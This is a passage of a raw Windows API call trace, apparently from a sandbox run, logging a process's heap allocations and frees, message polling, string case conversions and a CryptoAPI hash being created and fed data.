lpMsg=0x8bed60) returned 0 [0207.168] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1698 [0207.168] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17c8 [0207.168] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa260 [0207.168] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa8a8 [0207.168] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1738 [0207.168] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e40 [0207.168] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0207.168] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0207.168] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6b70 [0207.168] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2ba8 [0207.168] CharUpperBuffW (in: lpsz="A610080612A", cchLength=0xb | out: lpsz="A610080612A") returned 0xb [0207.169] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0207.169] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ba8 [0207.169] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1698 [0207.169] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa260 [0207.169] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa8a8 [0207.169] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17c8 [0207.169] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e40 [0207.169] CharUpperBuffW (in: lpsz="SSA610080612A", cchLength=0xd | out: lpsz="SSA610080612A") returned 0xd [0207.169] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0207.169] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0207.169] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ba8 [0207.169] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa260 [0207.169] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa8a8 [0207.169] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1698 [0207.169] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e40 [0207.169] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0207.169] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0207.169] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ba8 [0207.169] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0207.170] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d860 [0207.170] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0207.170] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ba8 [0207.170] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa860 [0207.170] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f48 [0207.170] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1698 [0207.170] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6b70 [0207.170] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17c8 [0207.170] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0207.170] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0207.170] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17c8 [0207.170] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1738 [0207.170] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa8a8 [0207.170] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e40 [0207.170] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c38 [0207.170] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab340 [0207.170] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0207.170] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0207.171] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0207.171] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17c8 [0207.171] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1738 [0207.171] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa8a8 [0207.171] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e40 [0207.171] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c38 [0207.171] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab340 [0207.171] CharUpperBuffW (in: lpsz="A0200C03718", cchLength=0xb | out: lpsz="A0200C03718") returned 0xb [0207.171] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0207.171] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17c8 [0207.171] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1738 [0207.171] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9cc0 [0207.171] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa968 [0207.171] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c38 [0207.171] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ac9f0 [0207.171] CharUpperBuffW (in: lpsz="SSA0200C03718", cchLength=0xd | out: lpsz="SSA0200C03718") returned 0xd [0207.171] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0207.171] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0207.171] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17c8 [0207.171] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1738 [0207.171] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9cc0 [0207.172] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa968 [0207.172] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c38 [0207.172] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ac9f0 [0207.172] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0207.172] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9af8 [0207.172] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17c8 [0207.172] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1738 [0207.172] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d38 [0207.172] CryptCreateHash (in: hProv=0xad2940, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x8bef50 | out: phHash=0x8bef50) returned 1 [0207.172] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x2416270 [0207.172] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466db0 [0207.172] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1748 [0207.172] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9af8 [0207.172] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d38 [0207.172] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f00 [0207.172] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1768 [0207.172] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0207.173] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13c8 [0207.173] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ba8 [0207.173] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1698 [0207.173] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466e10 [0207.173] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1778 [0207.173] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa110 [0207.173] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa080 [0207.173] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c18 [0207.173] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ff0 [0207.173] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0207.173] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0207.173] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13c8 [0207.173] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ba8 [0207.173] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa110 [0207.173] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa080 [0207.173] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1698 [0207.173] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ff0 [0207.173] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0207.173] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1788 [0207.173] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ee8 [0207.173] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f60 [0207.174] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13c8 [0207.174] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa110 [0207.174] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ba8 [0207.174] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466e10 [0207.174] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa080 [0207.174] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ff0 [0207.174] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1698 [0207.174] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d50 [0207.174] CharLowerBuffW (in: lpsz="byte[3]", cchLength=0x7 | out: lpsz="byte[3]") returned 0x7 [0207.174] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x24) returned 0x249f170 [0207.174] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ff0 [0207.174] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2ba8 [0207.174] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c48 [0207.174] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c18 [0207.174] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa230 [0207.174] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1778 [0207.174] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9648 [0207.174] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b16f8 [0207.175] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0207.175] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ff0 [0207.175] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa008 [0207.175] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ba8 [0207.175] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x14) returned 0x2466e10 [0207.175] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x24) returned 0x249f170 [0207.175] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ee8 [0207.175] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1788 [0207.175] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0207.175] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1698 [0207.175] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ff0 [0207.175] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa110 [0207.175] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16f8 [0207.175] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6b70 [0207.175] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b13c8 [0207.175] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0207.175] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0207.175] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13c8 [0207.175] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ba8 [0207.175] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa008 [0207.175] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ee8 [0207.176] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1788 [0207.176] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d50 [0207.176] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0207.176] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0207.176] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0207.176] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13c8 [0207.176] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ba8 [0207.176] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa008 [0207.176] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ee8 [0207.176] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1788 [0207.176] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d50 [0207.176] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0207.176] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa248 [0207.176] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1788 [0207.176] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2ba8 [0207.177] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e40 [0207.177] CryptHashData (hHash=0xaa5760, pbData=0x24b1778, dwDataLen=0x3, dwFlags=0x1) returned 1 [0207.177] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x2416270 [0207.177] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x14) returned 0x2466e30 [0207.177] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18c8 [0207.177] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa248 [0207.177] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab340 [0207.177] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa260 [0207.177] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17c8 [0207.177] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa260 | out: hHeap=0x25c0000) returned 1 [0207.177] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17c8 | out: hHeap=0x25c0000) returned 1 [0207.177] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab340 | out: hHeap=0x25c0000) returned 1 [0207.177] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab340 [0207.177] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa260 [0207.178] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa8a8 [0207.178] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17c8 [0207.178] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8a8 | out: hHeap=0x25c0000) returned 1 [0207.178] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17c8 | out: hHeap=0x25c0000) returned 1 [0207.178] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa260 | out: hHeap=0x25c0000) returned 1 [0207.178] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa260 [0207.178] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa8a8 [0207.178] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f48 [0207.178] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17c8 [0207.178] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f48 | out: hHeap=0x25c0000) returned 1 [0207.178] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17c8 | out: hHeap=0x25c0000) returned 1 [0207.178] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8a8 | out: hHeap=0x25c0000) returned 1 [0207.178] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x14) returned 0x2466d90 [0207.178] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x24) returned 0x249f1a0 [0207.178] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa8a8 [0207.179] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17c8 [0207.179] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f48 [0207.179] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0e0 [0207.179] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa050 [0207.179] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1788 [0207.179] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa050 | out: hHeap=0x25c0000) returned 1 [0207.179] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1788 | out: hHeap=0x25c0000) returned 1 [0207.179] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0e0 | out: hHeap=0x25c0000) returned 1 [0207.179] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0e0 [0207.179] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa050 [0207.179] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9bd0 [0207.179] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1788 [0207.179] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9bd0 | out: hHeap=0x25c0000) returned 1 [0207.179] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1788 | out: hHeap=0x25c0000) returned 1 [0207.179] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa050 | out: hHeap=0x25c0000) returned 1 [0207.180] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ba8 | out: hHeap=0x25c0000) returned 1 [0207.180] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c38 | out: hHeap=0x25c0000) returned 1 [0207.180] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1738 | out: hHeap=0x25c0000) returned 1 [0207.180] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1768 | out: hHeap=0x25c0000) returned 1 [0207.180] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e40 | out: hHeap=0x25c0000) returned 1 [0207.180] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0f8 | out: hHeap=0x25c0000) returned 1 [0207.180] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16f8 | out: hHeap=0x25c0000) returned 1 [0207.180] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa110 | out: hHeap=0x25c0000) returned 1 [0207.180] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa008 | out: hHeap=0x25c0000) returned 1 [0207.180] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f60 | out: hHeap=0x25c0000) returned 1 [0207.180] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d50 | out: hHeap=0x25c0000) returned 1 [0207.180] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ee8 | out: hHeap=0x25c0000) returned 1 [0207.180] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c48 | out: hHeap=0x25c0000) returned 1 [0207.180] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa080 | out: hHeap=0x25c0000) returned 1 [0207.181] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ff0 | out: hHeap=0x25c0000) returned 1 [0207.181] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9648 | out: hHeap=0x25c0000) returned 1 [0207.181] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa230 | out: hHeap=0x25c0000) returned 1 [0207.181] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fa8 | out: hHeap=0x25c0000) returned 1 [0207.181] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13c8 | out: hHeap=0x25c0000) returned 1 [0207.181] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249f170 | out: hHeap=0x25c0000) returned 1 [0207.181] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e10 | out: hHeap=0x25c0000) returned 1 [0207.181] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d98 | out: hHeap=0x25c0000) returned 1 [0207.181] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9db0 | out: hHeap=0x25c0000) returned 1 [0207.181] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac9f0 | out: hHeap=0x25c0000) returned 1 [0207.181] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa968 | out: hHeap=0x25c0000) returned 1 [0207.181] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9cc0 | out: hHeap=0x25c0000) returned 1 [0207.181] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9dc8 | out: hHeap=0x25c0000) returned 1 [0207.181] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa860 | out: hHeap=0x25c0000) returned 1 [0207.181] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0207.181] HeapFree (in: hHeap=0x25c0000, 